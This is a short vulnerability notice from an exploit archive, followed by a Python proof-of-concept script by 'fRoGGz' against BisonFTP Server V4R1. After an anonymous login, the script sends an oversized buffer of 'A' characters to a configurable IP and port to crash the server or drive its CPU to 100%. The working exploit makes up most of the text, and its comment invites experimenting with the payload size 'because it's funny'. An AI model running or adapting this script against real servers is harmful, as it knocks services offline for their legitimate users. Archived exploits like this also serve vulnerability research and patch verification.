source: https://www.securityfocus.com/bid/14079/info
BisonFTP is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users.
Reports indicate that the issue may be exploited only after successful authentication.#!/usr/bin/python## Vulnerability: Denial Of Service# Discovered on: June 26, 2005 by fRoGGz - SecuBox Labs# When an invalid buffer size is sent to BisonFTPD -> DoS (100% CPU usage or crash)# NB: Sorry for Python purists, it's the first time that i use it ;)import socket
import time
n =1
t =98192#Try others, it's funny.
p =21# Set your port here.
ip ="192.168.0.1"# Set ip here.
boom ="PoC "+'\x41'*t
print"\n\nVulnerable product: BisonFTP Server V4R1"print"Denial of Service vulnerability"print"---------------------------------------------"print"Discovered & coded by fRoGGz - SecuBox Labs\n"try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((ip,p))
d=s.recv(1024)print"[+] "+d
print"[+] Utilisateur."
time.sleep(1)
s.send('USER Anonymous\r\n')
s.recv(512)print"[+] Mot de passe."
time.sleep(1)
s.send('PASS Anonymous\r\n')
s.recv(512)print"[+] Envoi malicieux.\n\nDoS termine !\n"
time.sleep(1)
s.send(boom+'r\n\n')except:print"[+] Machine indisponible, verifiez le port ou l'ip."
